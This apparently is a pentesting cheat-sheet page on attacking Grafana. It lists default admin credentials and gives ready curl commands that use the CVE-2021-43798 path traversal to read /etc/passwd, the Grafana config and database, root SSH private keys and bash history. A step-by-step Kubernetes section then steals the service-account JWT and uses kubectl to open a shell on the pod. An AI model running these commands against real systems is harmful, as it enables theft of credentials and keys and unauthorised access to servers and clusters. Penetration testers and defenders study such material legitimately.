Grafana Pentesting

Grafana is a multi-platform analytics and interactive visualization web application.

Default Credential

admin:admin
admin:prom-operator

Configuration File

The configuration file contains the admin credentials. See the “admin_user” and “admin_password” section in the file.

/etc/grafana/grafana.ini

Path Traversal

curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/passwd -o passwd
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini -o grafana.ini
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.bash_history
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.bash_history

Getting a Shell vis JWT, Grafana Pod

Some Grafana versions are vulnerable to Path Traversal. Kubernetes creates environment variables by default.

1. Check Environment Variables on the Target Machine

env

If you got the GRAFANA environment like the following, the Grafana service is running on the cluster.

GRAFANA_SERVICE_HOST=10.108.133.228
GRAFANA_PORT=tcp://10.108.133.228:3000
GRAFANA_PORT_3000_TCP=tcp://10.108.133.228:3000

2. Access the Grafana Dashboard

You can access the service at http://\:\.

3. Get the JWT of the Service Account

Using Path Traversal (CVE-2021-43798).

curl --path-as-is http://<grafana-ip>:<grafana-port>/public/plugins/alertlist/../../../../../../../../etc/passwd

Get the token (JWT) of the service account.

curl --path-as-is http://grafana:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token

4. Decode the JWT and Get Sensitive Information

See JWT Pentesting.

5. Check Your Permission of This Service

Using the JWT, you should get permissions.

kubectl auth can-i --list --token=<Grafana-JWT>

# List pods
kubectl get pods --token=<JWT>

6. Get a Shell on the Grafana Pod

kubectl exec -it <grafana-pod-name> --token=<Grafana-JWT> -- /bin/bash

PreviousFile Inclusion (LFI/RFI)NextHashiCorp Consul Pentesting

Last updated 1 month ago

hashtagDefault Credential

hashtagConfiguration File

hashtagPath Traversal

hashtagGetting a Shell vis JWT, Grafana Pod

hashtag1. Check Environment Variables on the Target Machine

hashtag2. Access the Grafana Dashboard

hashtag3. Get the JWT of the Service Account

hashtag4. Decode the JWT and Get Sensitive Information

hashtag5. Check Your Permission of This Service

hashtag6. Get a Shell on the Grafana Pod